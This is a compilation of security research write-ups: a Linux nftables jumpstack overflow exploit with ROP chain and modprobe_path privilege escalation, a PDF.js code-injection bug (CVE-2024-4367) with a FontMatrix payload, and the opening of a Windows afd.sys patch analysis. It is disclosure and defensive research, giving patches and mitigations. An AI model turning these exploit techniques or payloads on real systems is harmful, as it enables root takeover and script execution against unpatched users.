	struct nft_traceinfo info;

	info.trace = false;
	if (static_branch_unlikely(&nft_trace_enabled))
		nft_trace_init(&info, pkt, &regs.verdict, basechain);
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);       // Get correct chain generation
	else
		blob = rcu_dereference(chain->blob_gen_0);

	rule = (struct nft_rule_dp *)blob->data;          // Get fist and last rules in chain
	last_rule = (void *)blob->data + blob->size;
next_rule:
	regs.verdict.code = NFT_CONTINUE;
	for (; rule < last_rule; rule = nft_rule_next(rule)) {   // 3. for each rule in chain
		nft_rule_dp_for_each_expr(expr, last, rule) {    // 4. for each expr in rule
			...
			expr_call_ops_eval(expr, &regs, pkt);    // 5. expr->ops->eval()

			if (regs.verdict.code != NFT_CONTINUE)
				break;
		}

		...
		break;
	}

	...
switch (regs.verdict.code) {
	case NFT_JUMP:
		/*
			1. If we're jumping to the next chain, store a pointer to the next rule of the 
      current chain in the jumpstack, increase the stack pointer and switch chain
		*/
		if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
			return NF_DROP;	
		jumpstack[stackptr].chain = chain;
		jumpstack[stackptr].rule = nft_rule_next(rule);
		jumpstack[stackptr].last_rule = last_rule;
		stackptr++;
		fallthrough;
	case NFT_GOTO:
		chain = regs.verdict.chain;
		goto do_chain;
	case NFT_CONTINUE:
	case NFT_RETURN:
		break;
	default:
		WARN_ON_ONCE(1);
	}
	/*
		2. If we got here then we completed the latest chain and can now evaluate
		the next rule in the previous one
	*/
	if (stackptr > 0) {
		stackptr--;
		chain = jumpstack[stackptr].chain;
		rule = jumpstack[stackptr].rule;
		last_rule = jumpstack[stackptr].last_rule;
		goto next_rule;
	}
		...

The first 8 jumps fall into case 1. where the NFT_JUMP verdict increases stackptr to align it with our controlled elements, then, on the 9th jump, we overwrite the 8th element containing the next rule and return from the current chain landing on the corrupted one. At 2. the stack pointer is decremented and control is returned to the previous chain.
Finally, the next rule in chain 8 gets dereferenced at 3: nft_rule_next(rule), too bad we just filled it with 0x42s, causing the protection fault.

2.2.2 Controlling the execution flow

Other than the rule itself, there are other pointers that should be taken care of to prevent the kernel from crashing, especially the ones dereferenced by nft_rule_dp_for_each_expr when looping through all rule expressions:

/* net/netfilter/nf_tables_core.c */

#define nft_rule_expr_first(rule)	(struct nft_expr *)&rule->data[0]
#define nft_rule_expr_next(expr)	((void *)expr) + expr->ops->size
#define nft_rule_expr_last(rule)	(struct nft_expr *)&rule->data[rule->dlen]
#define nft_rule_next(rule)		(void *)rule + sizeof(*rule) + rule->dlen

#define nft_rule_dp_for_each_expr(expr, last, rule) \
        for ((expr) = nft_rule_expr_first(rule), (last) = nft_rule_expr_last(rule); \
             (expr) != (last); \
             (expr) = nft_rule_expr_next(expr))
  1. nft_do_chain requires rule to be smaller than last_rule to enter the outer loop. This is not an issue as we control both fields in the 8th element. Furthermore, rule will point to another address in the jumpstack we control as to reference valid memory.
  2. nft_rule_dp_for_each_expr thus calls nft_rule_expr_first(rule) to get the first expr from its data buffer, 8 bytes after rule. We can discard the result of nft_rule_expr_last(rule) since it won’t be dereferenced during the attack.
(remote) gef➤ p (int)&((struct nft_rule_dp *)0)->data
$29 = 0x8
(remote) gef➤ p *(struct nft_expr *) rule->data
$30 = {
  ops = 0xffffffff82328780,
  data = 0xffff888003788a38 "1374\377\377\377"
}
(remote) gef➤ x/101 0xffffffff81a4fbdf
=> 0xffffffff81a4fbdf <nft_do_chain+143>:   cmp   r12,rbp
0xffffffff81a4fbe2 <nft_do_chain+146>:      jae   0xffffffff81a4feaf
0xffffffff81a4fbe8 <nft_do_chain+152>:      movz  eax,WORD PTR [r12]                  <== load rule into eax
0xffffffff81a4fbed <nft_do_chain+157>:      lea   rbx,[r12+0x8]                       <== load expr into rbx
0xffffffff81a4fbf2 <nft_do_chain+162>:      shr   ax,1
0xffffffff81a4fbf5 <nft_do_chain+165>:      and   eax,0xfff
0xffffffff81a4fbfa <nft_do_chain+170>:      lea   r13,[r12+rax*1+0x8]
0xffffffff81a4fbff <nft_do_chain+175>:      cmp   rbx,r13
0xffffffff81a4fc02 <nft_do_chain+178>:      jne   0xffffffff81a4fce5 <nft_do_chain+405>
0xffffffff81a4fc08 <nft_do_chain+184>:      jmp   0xffffffff81a4fed9 <nft_do_chain+905>

3. nft_do_chain calls expr->ops->eval(expr, regs, pkt); via expr_call_ops_eval(expr, &regs, pkt), so the dereference chain has to be valid and point to executable memory. Fortunately, all fields are at offset 0, so we can just place the expr, ops and eval pointers all next to each other to simplify the layout.

(remote) gef➤ x/4i 0xffffffff81a4fcdf
0xffffffff81a4fcdf <nft_do_chain+399>:      je    0xffffffff81a4feef <nft_do_chain+927>
0xffffffff81a4fce5 <nft_do_chain+405>:      mov   rax,QWORD PTR [rbx]                <== first QWORD at expr is expr->ops, store it into rax
0xffffffff81a4fce8 <nft_do_chain+408>:      cmp   rax,0xffffffff82328900 
=> 0xffffffff81a4fcee <nft_do_chain+414>:   jne   0xffffffff81a4fc0d <nft_do_chain+189>
(remote) gef➤ x/gx $rax
0xffffffff82328780 :    0xffffffff81a65410
(remote) gef➤ x/4i 0xffffffff81a65410
0xffffffff81a65410 <nft_immediate_eval>:    movzx eax,BYTE PTR [rdi+0x18]            <== first QWORD at expr->ops points to expr->ops->eval
0xffffffff81a65414 <nft_immediate_eval+4>:  movzx ecx,BYTE PTR [rdi+0x19]
0xffffffff81a65418 <nft_immediate_eval+8>:  mov   r8,rsi
0xffffffff81a6541b <nft_immediate_eval+11>: lea   rsi,[rdi+0x8]

In order to preserve as much space as possible, the layout for stack pivoting can be arranged inside the registers before the overflow. Since these values will be copied inside the jumpstack, we have enough time to perform the following steps:

  1. Setup a stack pivot payload to NFT_REG32_00 by repeatedly invoking nft_rule_immediate expressions as shown above. Remember that we had leaked the regs address.
  2. Add the vulnerable nft_rule_payload expression that will later overflow the jumpstack with the previously added registers.
  3. Refill the registers with a ROP chain to elevate privileges with nft_rule_immediate.
  4. Trigger the overflow: code execution will start from the jumpstack and then pivot to the ROP chain starting from NFT_REG32_00.

By following these steps we managed to store the eval pointer and the stack pivot routine on the jumpstack, which would’ve otherwise filled up the regs too quickly.
In fact, without this optimization, the required space would be:
8 (rule) + 8 (expr) + 8 (eval) + 64 (ROP chain) = 88 bytes
Unfortunately, the regs buffer can only hold 64 bytes.

By applying the described technique we can reduce it to:

  • jumpstack: 8 (rule) + 8 (expr) + 8 (eval) = 24 bytes
  • regs: 64 bytes (ROP chain) which will fit perfectly in the available space.

Here is how I crafted the fake jumpstack to achieve initial code execution:

struct jumpstack_t fill_jumpstack(unsigned long regs, unsigned long kaslr) 
{
    struct jumpstack_t jumpstack = {0};
    /*
        align payload to rule
    */
    jumpstack.init = 'A';
    /*
        rule->expr will skip 8 bytes, here we basically point rule to itself + 8
    */
    jumpstack.rule =  regs + 0xf0;
    jumpstack.last_rule = 0xffffffffffffffff;
    /*
        point expr to itself + 8 so that eval() will be the next pointer
    */
    jumpstack.expr = regs + 0x100;
    /*
        we're inside nft_do_chain and regs is declared in the same function,
        finding the offset should be trivial: 
        stack_pivot = &NFT_REG32_00 - RSP
        the pivot will add 0x48 to RSP and pop 3 more registers, totaling 0x60
    */
    jumpstack.pivot = 0xffffffff810280ae + kaslr;
    unsigned char pad[31] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    strcpy(jumpstack.pad, pad);
    return jumpstack;
}

2.2.3 Getting UID 0

The next steps consist in finding the right gadgets to build up the ROP chain and make the exploit as stable as possible.

There exist several tools to scan for ROP gadgets, but I found that most of them couldn’t deal with large images too well. Furthermore, for some reason, only ROPgadget manages to find all the stack pivots in function epilogues, even if it prints them as static offset. Out of laziness, I scripted my own gadget finder based on objdump, that would be useful for short relative pivots (rsp + small offset):

#!/bin/bash

objdump -j .text -M intel -d linux-6.1.6/vmlinux > obj.dump
grep -n '48 83 c4 30' obj.dump | while IFS=":" read -r line_num line; do
        ret_line_num=$((line_num + 7))
        if [[ $(awk "NR==$ret_line_num" obj.dump | grep ret) =~ ret ]]; then
                out=$(awk "NR>=$line_num && NR<=$ret_line_num" obj.dump)
                if [[ ! $out == *"mov"* ]]; then
                        echo "$out"
                        echo -e "\n-----------------------------"
                fi
        fi
done

In this example case we’re looking to increase rsp by 0x60, and our script will find all stack cleanup routines incrementing it by 0x30 and then popping 6 more registers to reach the desired offset:

ffffffff8104ba47:    48 83 c4 30       add гsp, 0x30
ffffffff8104ba4b:    5b                pop rbx
ffffffff8104ba4c:    5d                pop rbp
ffffffff8104ba4d:    41 5c             pop r12
ffffffff8104ba4f:    41 5d             pop г13
ffffffff8104ba51:    41 5e             pop r14
ffffffff8104ba53:    41 5f             pop r15
ffffffff8104ba55:    e9 a6 78 fb 00    jmp ffffffff82003300 <____x86_return_thunk>

Even though it seems to be calling a jmp, gdb can confirm that we’re indeed returning to the saved rip via ret:

(remote) gef➤ x/10i 0xffffffff8104ba47
0xffffffff8104ba47 <set_cpu_sibling_map+1255>:    add   rsp,0x30
0xffffffff8104ba4b <set_cpu_sibling_map+1259>:    pop   rbx
0xffffffff8104ba4c <set_cpu_sibling_map+1260>:    pop   rbp
0xffffffff8104ba4d <set_cpu_sibling_map+1261>:    pop   r12
0xffffffff8104ba4f <set_cpu_sibling_map+1263>:    pop   r13
0xffffffff8104ba51 <set_cpu_sibling_map+1265>:    pop   r14
0xffffffff8104ba53 <set_cpu_sibling_map+1267>:    pop   r15
0xffffffff8104ba55 <set_cpu_sibling_map+1269>:    ret

Of course, the script can be adjusted to look for different gadgets.

Now, as for the privesc itself, I went for the most convenient and simplest approach, that is overwriting the modprobe_path variable to run a userland binary as root. Since this technique is widely known, I’ll just leave an in-depth analysis here:
We’re assuming that STATIC_USERMODEHELPER is disabled.

In short, the payload does the following:

  1. pop rax; ret : Set rax = /tmp/runme where runme is the executable that modprobe will run as root when trying to find the right module for the specified binary header.
  2. pop rdi; ret: Set rdi = &modprobe_path, this is just the memory location for the modprobe_path global variable.
  3. mov qword ptr [rdi], rax; ret: Perform the copy operation.
  4. mov rsp, rbp; pop rbp; ret: Return to userland.

While the first three gadgets are pretty straightforward and common to find, the last one requires some caution. Normally a kernel exploit would switch context by calling the so-called KPTI trampoline swapgs_restore_regs_and_return_to_usermode, a special routine that swaps the page tables and the required registers back to the userland ones by executing the swapgs and iretq instructions.
In our case, since the ROP chain is running in the softirq context, I’m not sure if using the same method would have worked reliably, it’d probably just be better to first return to the syscall context and then run our code from userland.

Here is the stack frame from the ROP chain execution context:

gef➤ bt
#0 nft_payload_eval (expr=0xffff888805e769f0, regs=0xffffc90000083950, pkt=0xffffc90000883689) at net/netfilter/nft_payload.c:124
#1 0xffffffff81c2cfa1 in expr_call_ops_eval (pkt=0xffffc90000083b80, regs=0xffffc90000083950, expr=0xffff888005e769f0)
#2 nft_do_chain (pkt=pkt@entry=0xffffc90000083b80, priv=priv@entry=0xffff888005f42a50) at net/netfilter/nf_tables_core.c:264
#3 0xffffffff81c43b14 in nft_do_chain_netdev (priv=0xffff888805f42a50, skb=, state=)
#4 0xffffffff81c27df8 in nf_hook_entry_hookfn (state=0xffffc90000083c50, skb=0xffff888005f4a200, entry=0xffff88880591cd88)
#5 nf_hook_slow (skb=skb@entry=0xffff888005f4a200, state-state@entry=0xffffc90808083c50, e=e@entry=0xffff88800591cd00, s=s@entry=0...
#6 0xffffffff81b7abf7 in nf_hook_ingress (skb=) at ./include/linux/netfilter_netdev.h:34
#7 nf_ingress (orig_dev=0xffff888005ff0000, ret=, pt_prev=, skb=) at net/core,
#8 ___netif_receive_skb_core (pskb=pskb@entry=0xffffc90000083cd0, pfmemalloc=pfmemalloc@entry=0x0, ppt_prev=ppt_prev@entry=0xffffc9...
#9 0xffffffff81b7b0ef in _netif_receive_skb_one_core (skb=, pfmemalloc=pfmemalloc@entry=0x0) at net/core/dev.c:548
#10 0xffffffff81b7b1a5 in ___netif_receive_skb (skb=) at net/core/dev.c:5603
#11 0xffffffff81b7b40a in process_backlog (napi=0xffff888007a335d0, quota=0x40) at net/core/dev.c:5931
#12 0xffffffff81b7c013 in ___napi_poll (n=n@entry=0xffff888007a335d0, repoll=repoll@entry=0xffffc90000083daf) at net/core/dev.c:6498
#13 0xffffffff81b7c493 in napi_poll (repoll=0xffffc90000083dc0, n=0xffff888007a335d0) at net/core/dev.c:6565
#14 net_rx_action (h=) at net/core/dev.c:6676
#15 0xffffffff82280135 in ___do_softirq () at kernel/softirq.c:574

Any function between the last corrupted one and __do_softirq would work to exit gracefully. To simulate the end of the current chain evaluation we can just return to nf_hook_slow since we know the location of its rbp.

Yes, we should also disable maskable interrupts via a cli; ret gadget, but we wouldn’t have enough space, and besides, we will be discarding the network interface right after.

To prevent any deadlocks and random crashes caused by skipping over the nft_do_chain function, a NFT_MSG_DELTABLE message is immediately sent to flush all nftables structures and we quickly exit the program to disable the network interface connected to the new network namespace.
Therefore, gadget 4 just pops nft_do_chain’s rbp and runs a clean leave; ret, this way we don’t have to worry about forcefully switching context.
As soon as execution is handed back to userland, a file with an unknown header is executed to trigger the executable under modprobe_path that will add a new user with UID 0 to /etc/passwd.

While this is in no way a data-only exploit, notice how the entire exploit chain lives inside kernel memory, this is crucial to bypass mitigations:

  • KPTI requires page tables to be swapped to the userland ones while switching context, __do_softirq will take care of that.
  • SMEP/SMAP prevent us from reading, writing and executing code from userland while in kernel mode. Writing the whole ROP chain in kernel memory that we control allows us to fully bypass those measures as well.

2.3. Patching the tables

Patching this vulnerability is trivial, and the most straightforward change has been approved by Linux developers:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

While this fix is valid, I believe that simplifying the whole expression would have been better:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen = VLAN_ETH_HLEN + vlan_hlen - offset;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

since ethlen is initialized with len and is never updated.

The vulnerability existed since Linux v5.5-rc1 and has been patched with commit 696e1a48b1a1b01edad542a1ef293665864a4dd0 in Linux v6.2-rc5.

One possible approach to making this vulnerability class harder to exploit involves using the same randomization logic as the one in the kernel stack (aka per-syscall kernel-stack offset randomization): by randomizing the whole kernel stack on each syscall entry, any KASLR leak is only valid for a single attempt. This security measure isn’t applied when entering the softirq context as a new stack is allocated for those operations at a static address.

You can find the PoC with its kernel config on my Github profile. The exploit has purposefully been built with only a specific kernel version in mind, as to make it harder to use it for illicit purposes. Adapting it to another kernel would require the following steps:

  • Reshaping the kernel leak from the nft registers,
  • Finding the offsets of the new symbols,
  • Calculating the stack pivot length
  • etc.

In the end this was just a side project, but I’m glad I was able to push through the initial discomforts as the final result is something I am really proud of. I highly suggest anyone interested in kernel security and CTFs to spend some time auditing the Linux kernel to make our OSs more secure and also to have some fun!
I’m writing this article one year after the 0-day discovery, so I expect there to be some inconsistencies or mistakes, please let me know if you spot any.

I want to thank everyone who allowed me to delve into this research with no clear objective in mind, especially my team @ Betrusted and the HackInTheBox crew for inviting me to present my experience in front of so many great people! If you’re interested, you can watch my presentation here:

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

research by Thomas Rinsma

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

TL;DR 

This post details CVE-2024-4367, a vulnerability in PDF.js found by Codean Labs. PDF.js is a JavaScript-based PDF viewer maintained by Mozilla. This bug allows an attacker to execute arbitrary JavaScript code as soon as a malicious PDF file is opened. This affects all Firefox users (<126) because PDF.js is used by Firefox to show PDF files, but also seriously impacts many web- and Electron-based applications that (indirectly) use PDF.js for preview functionality.

If you are a developer of a JavaScript/Typescript-based application that handles PDF files in any way, we recommend checking that you are not (indirectly) using a version a vulnerable version of PDF.js. See the end of this post for mitigation details.

Introduction 

There are two common use-cases for PDF.js. First, it is Firefox’s built-in PDF viewer. If you use Firefox and you’ve ever downloaded or browsed to a PDF file you’ll have seen it in action. Second, it is bundled into a Node module called 

pdfjs-dist
, with ~2.7 million weekly downloads according to NPM. In this form, websites can use it to provide embedded PDF preview functionality. This is used by everything from Git-hosting platforms to note-taking applications. The one you’re thinking of now is likely using PDF.js.

The PDF format is famously complex. With support for various media types, complicated font rendering and even rudimentary scripting, PDF readers are a common target for vulnerability researchers. With such a large amount of parsing logic, there are bound to be some mistakes, and PDF.js is no exception to this. What makes it unique however is that it is written in JavaScript as opposed to C or C++. This means that there is no opportunity for memory corruption problems, but as we will see it comes with its own set of risks.

Glyph rendering 

You might be surprised to hear that this bug is not related to the PDF format’s (JavaScript!) scripting functionality. Instead, it is an oversight in a specific part of the font rendering code.

Fonts in PDFs can come in several different formats, some of them more obscure than others (at least for us). For modern formats like TrueType, PDF.js defers mostly to the browser’s own font renderer. In other cases, it has to manually turn glyph (i.e., character) descriptions into curves on the page. To optimize this for performance, a path generator function is pre-compiled for every glyph. If supported, this is done by making a JavaScript 

Function
 object with a body (
jsBuf
) containing the instructions that make up the path:

// If we can, compile cmds into JS for MAXIMUM SPEED...
if (this.isEvalSupported && FeatureTest.isEvalSupported) {
  const jsBuf = [];
  for (const current of cmds) {
    const args = current.args !== undefined ? current.args.join(",") : "";
    jsBuf.push("c.", current.cmd, "(", args, ");\n");
  }
  // eslint-disable-next-line no-new-func
  console.log(jsBuf.join(""));
  return (this.compiledGlyphs[character] = new Function(
    "c",
    "size",
    jsBuf.join("")
  ));
}

From an attacker perspective this is really interesting: if we can somehow control these 

cmds
 going into the 
Function
 body and insert our own code, it would be executed as soon as such a glyph is rendered.

Well, let’s look at how this list of commands is generated. Following the logic back to the 

CompiledFont
 class we find the method 
compileGlyph(...)
. This method initializes the 
cmds
 array with a few general commands (
save
transform
scale
 and 
restore
), and defers to a 
compileGlyphImpl(...)
 method to fill in the actual 

compileGlyph(code, glyphId) {
    if (!code || code.length === 0 || code[0] === 14) {
      return NOOP;
    }

    let fontMatrix = this.fontMatrix;
    ...

    const cmds = [
      { cmd: "save" },
      { cmd: "transform", args: fontMatrix.slice() },
      { cmd: "scale", args: ["size", "-size"] },
    ];
    this.compileGlyphImpl(code, cmds, glyphId);

    cmds.push({ cmd: "restore" });

    return cmds;
  }

If we instrument the PDF.js code to log generated 

Function
 objects, we see that the generated code indeed contains those commands:

c.save();
c.transform(0.001,0,0,0.001,0,0);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();

At this point we could audit the font parsing code and the various commands and arguments that can be produced by glyphs, like 

quadraticCurveTo
 and 
bezierCurveTo
, but all of this seems pretty innocent with no ability to control anything other than numbers. What turns out to be much more interesting however is the 
transform
 command we saw above:

{ cmd: "transform", args: fontMatrix.slice() },

This 

fontMatrix
 array is copied (with 
.slice()
) and inserted into the body of the 
Function
 object, joined by commas. The code clearly assumes that it is a numeric array, but is that always the case? Any string inside this array would be inserted literally, without any quotes surrounding it. Hence, that would break the JavaScript syntax at best, and give arbitrary code execution at worst. But can we even control the contents of 
fontMatrix
 to that degree?

Enter the FontMatrix 

The value of 

fontMatrix
 defaults to 
[0.001, 0, 0, 0.001, 0, 0]
, but is often set to a custom matrix by a font itself, i.e., in its own embedded metadata. How this is done exactly differs per font format. Here’s the Type1parser for example:

extractFontHeader(properties) {
    let token;
    while ((token = this.getToken()) !== null) {
      if (token !== "/") {
        continue;
      }
      token = this.getToken();
      switch (token) {
        case "FontMatrix":
          const matrix = this.readNumberArray();
          properties.fontMatrix = matrix;
          break;
        ...
      }
      ...
    }
    ...
  }

This is not very interesting for us. Even though Type1 fonts technically contain arbitrary Postscript code in their header, no sane PDF reader supports this fully and most just try to read predefined key-value pairs with expected types. In this case, PDF.js just reads a number array when it encounters a 

FontMatrix
 key. It appears that the 
CFF
 parser — used for several other font formats — is similar in this regard. All in all, it looks like we are indeed limited to numbers.

However, it turns out that there is more than one potential origin of this matrix. Apparently, it is also possible to specify a custom 

FontMatrix
 value outside of a font, namely in a metadata object in the PDF! Looking carefully at the 
PartialEvaluator.translateFont(...)
 method, we see that it loads various attributes from PDF dictionaries associated with the font, one of them being the 
fontMatrix
:

const properties = {
      type,
      name: fontName.name,
      subtype,
      file: fontFile,
      ...
      fontMatrix: dict.getArray("FontMatrix") || FONT_IDENTITY_MATRIX,
      ...
      bbox: descriptor.getArray("FontBBox") || dict.getArray("FontBBox"),
      ascent: descriptor.get("Ascent"),
      descent: descriptor.get("Descent"),
      xHeight: descriptor.get("XHeight") || 0,
      capHeight: descriptor.get("CapHeight") || 0,
      flags: descriptor.get("Flags"),
      italicAngle: descriptor.get("ItalicAngle") || 0,
      ...
    };

In the PDF format, font definitions consists of several objects. The 

Font
, its 
FontDescriptor
 and the actual 
FontFile
. For example, here represented by objects 1, 2 and 3:

1 0 obj
<<
  /Type /Font
  /Subtype /Type1
  /FontDescriptor 2 0 R
  /BaseFont /FooBarFont
>>
endobj

2 0 obj
<<
  /Type /FontDescriptor
  /FontName /FooBarFont
  /FontFile 3 0 R
  /ItalicAngle 0
  /Flags 4
>>
endobj

3 0 obj
<<
  /Length 100
>>
... (actual binary font data) ...
endobj

The 

dict
 referenced by the code above refers to the 
Font
 object. Hence, we should be able to define a custom 
FontMatrix
 array like this:

1 0 obj
<<
  /Type /Font
  /Subtype /Type1
  /FontDescriptor 2 0 R
  /BaseFont /FooBarFont
  /FontMatrix [1 2 3 4 5 6]   % <-----
>>
endobj

When attempting to do this it initially looks like this doesn’t work, as the 

transform
 operations in generated 
Function
 bodies still use the default matrix. However, this happens because the font file itself is overwriting the value. Luckily, when using a Type1 font without an internal 
FontMatrix
 definition, the PDF-specified value is authoritative as the 
fontMatrix
 value is not overwritten.

Now that we can control this array from a PDF object we have all the flexibility we want, as PDF supports more than just number-type primitives. Let’s try inserting a string-type value instead of a number (in PDF, strings are delimited by parentheses):

/FontMatrix [1 2 3 4 5 (foobar)]

And indeed, it is plainly inserted into the 

Function
 body!

c.save();
c.transform(1,2,3,4,5,foobar);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();

Exploitation and impact 

Inserting arbitrary JavaScript code is now only a matter of juggling the syntax properly. Here’s a classical example triggering an alert, by first closing the 

c.transform(...)
 function, and making use of the trailing parenthesis:

/FontMatrix [1 2 3 4 5 (0\); alert\('foobar')]

The result is exactly as expected:

Exploitation of CVE-2024-4367

You can find a proof-of-concept PDF file here. It is made to be easy to adapt using a regular text editor. To demonstrate the context in which the JavaScript is running, the alert will show you the value of 

window.origin
. Interestingly enough, this is not the 
file://
 path you see in the URL bar (if you’ve downloaded the file). Instead, PDF.js runs under the origin 
resource://pdf.js
. This prevents access to local files, but it is slightly more privileged in other aspects. For example, it is possible to invoke a file download (through a dialog), even to “download” arbitrary 
file://
 URLs. Additionally, the real path of the opened PDF file is stored in 
window.PDFViewerApplication.url
, allowing an attacker to spy on people opening a PDF file, learning not just when they open the file and what they’re doing with it, but also where the file is located on their machine.

In applications that embed PDF.js, the impact is potentially even worse. If no mitigations are in place (see below), this essentially gives an attacker an XSS primitive on the domain which includes the PDF viewer. Depending on the application this can lead to data leaks, malicious actions being performed in the name of a victim, or even a full account take-over. On Electron apps that do not properly sandbox JavaScript code, this vulnerability even leads to native code execution (!). We found this to be the case for at least one popular Electron app.

Mitigation 

At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development. Click here to learn more.

The best mitigation against this vulnerability is to update PDF.js to version 4.2.67 or higher. Most wrapper libraries like 

react-pdf
 have also released patched versions. Because some higher level PDF-related libraries statically embed PDF.js, we recommend recursively checking your 
node_modules
 folder for files called 
pdf.js
to be sure. Headless use-cases of PDF.js (e.g., on the server-side to obtain statistics and data from PDFs) seem not to be affected, but we didn’t thoroughly test this. It is also advised to update.

Additionally, a simple workaround is to set the PDF.js setting 

isEvalSupported
 to 
false
. This will disable the vulnerable code-path. If you have a strict content-security policy (disabling the use of 
eval
 and the 
Function
constructor), the vulnerability is also not reachable.

Timeline 

  • 2024-04-26 – vulnerability disclosed to Mozilla
  • 2024-04-29 – PDF.js v4.2.67 released to NPM, fixing the issue
  • 2024-05-14 – Firefox 126, Firefox ESR 115.11 and Thunderbird 115.11 released including the fixed version of PDF.js
  • 2024-05-20 – publication of this blogpost

Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours

Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours

Original text by By Valentina Palmiotti co-authored by Ruben Boonen

‘Patch Tuesday, Exploit Wednesday’ is an old hacker adage that refers to the weaponization of vulnerabilities the day after monthly security patches become publicly available. As security improves and exploit mitigations become more sophisticated, the amount of research and development required to craft a weaponized exploit has increased. This is especially relevant for memory corruption vulnerabilities.

However, with the addition of new features (and memory-unsafe C code) in the Windows 11 kernel, ripe new attack surfaces can be introduced. By honing in on this newly introduced code, we demonstrate that vulnerabilities that can be trivially weaponized still occur frequently. In this blog post, we analyze and exploit a vulnerability in the Windows Ancillary Function Driver for Winsock, 

afd.sys
, for Local Privilege Escalation (LPE) on Windows 11. Though neither of us had any previous experience with this kernel module, we were able to diagnose, reproduce, and weaponize the vulnerability in about a day. You can find the exploit code here.

Patch Diff and Root Cause Analysis

Based on the details of CVE-2023-21768 published by the Microsoft Security Response Center (MSRC), the vulnerability exists within the Ancillary Function Driver (AFD), whose binary filename is 

afd.sys
. The AFD module is the kernel entry point for the Winsock API. Using this information, we analyzed the driver version from December 2022 and compared it to the version newly released in January 2023. These samples can be obtained individually from Winbindex without the time-consuming process of extracting changes from Microsoft patches. The two versions analyzed are shown below.

  • AFD.sys / Windows 11 22H2 / 10.0.22621.608 (December 2022)
  • AFD.sys / Windows 11 22H2 / 10.0.22621.1105 (January 2023)

Ghidra was used to create binary exports for both of these files so they could be compared in BinDiff. An overview of the matched functions is shown below.

Figure 2 — Binary comparison of AFD.sys

Only one function appeared to have been changed, 

afd!AfdNotifyRemoveIoCompletion
. This significantly sped up our analysis of the vulnerability. We then compared both of the functions. The screenshots below show the changed code pre- and post-patch when looking at the decompiled code in Binary Ninja.

Pre-patch, 

afd.sys version 10.0.22621.608
.

Figure 3 — afd!AfdNotifyRemoveIoCompletion pre-patch

Post-patch, 

afd.sys version 10.0.22621.1105
.

Figure 4 — afd!AfdNotifyRemoveIoCompletion post-patch

This change shown above is the only update to the identified function. Some quick analysis showed that a check is being performed based on 

<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/previousmode" target="_blank" rel="noreferrer noopener">PreviousMode</a>
. If 
PreviousMode
 is zero (indicating that the call originates from the kernel) a value is written to a pointer specified by a field in an unknown structure. If, on the other hand, 
PreviousMode
 is not zero then 
<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-probeforwrite" target="_blank" rel="noreferrer noopener">ProbeForWrite</a>
 is called to ensure that the pointer set out in the field is a valid address that resides within user mode.

This check is missing in the pre-patch version of the driver. Since the function has a specific switch statement for 

PreviousMode
, the assumption is that the developer intended to add this check but forgot (we all lack coffee sometimes !).

From this update, we can infer that an attacker can reach this code path with a controlled value at 

field_0x18
 of the unknown structure. If an attacker is able to populate this field with a kernel address, then it’s possible to create an arbitrary kernel Write-Where primitive. At this point, it is not clear what value is being written, but any value could potentially be used for a Local Privilege Escalation primitive.

The function prototype itself contains both the 

PreviousMode
 value and a pointer to the unknown structure as the first and third arguments respectively.

Figure 5 — afd!AfdNotifyRemoveIoCompletion function prototype

Reverse Engineering

We now know the location of the vulnerability, but not how to trigger the execution of the vulnerable code path. We’ll do some reverse engineering before beginning to work on a Proof-of-Concept (PoC).

First, the vulnerable function was cross-referenced to understand where and how it was used.

Figure 6 — afd!AfdNotifyRemoveIoCompletion cross-references

A single call to the vulnerable function is made in 

afd!AfdNotifySock
.

We repeat the process, looking for cross-references to 

AfdNotifySock
. We find no direct calls to the function, but its address appears above a table of function pointers named 
AfdIrpCallDispatch
.

Figure 7 — afd!AfdIrpCallDispatch

This table contains the dispatch routines for the AFD driver. Dispatch routines are used to handle requests from Win32 applications by calling 

<a href="https://learn.microsoft.com/en-us/windows/win32/api/ioapiset/nf-ioapiset-deviceiocontrol" target="_blank" rel="noreferrer noopener">DeviceIoControl</a>
. The control code for each function is found in 
AfdIoctlTable
.

However, the pointer above is not within the 

AfdIrpCallDispatch
 table as we expected. From Steven Vittitoe’s Recon talk slides, we discovered that there are actually two dispatch tables for AFD. The second being 
AfdImmediateCallDispatch
. By calculating the distance between the start of this table and where the pointer to 
AfdNotifySock
 is stored, we can calculate the index into the 
AfdIoctlTable
 which shows the control code for the function is 
0x12127
.

Figure 8 — afd!AfdIoctlTable

It’s worth noting that it’s the last input/output control (IOCTL) code in the table, indicating that 

AfdNotifySock
 is likely a new dispatch function that has been recently added to the AFD driver.

At this point, we had a couple of options. We could reverse engineer the corresponding Winsock API in a user space to better understand how the underlying kernel function was called, or reverse engineer the kernel code and call into it directly. We didn’t actually know which Winsock function corresponded to 

AfdNotifySock
, so we opted to do the latter.

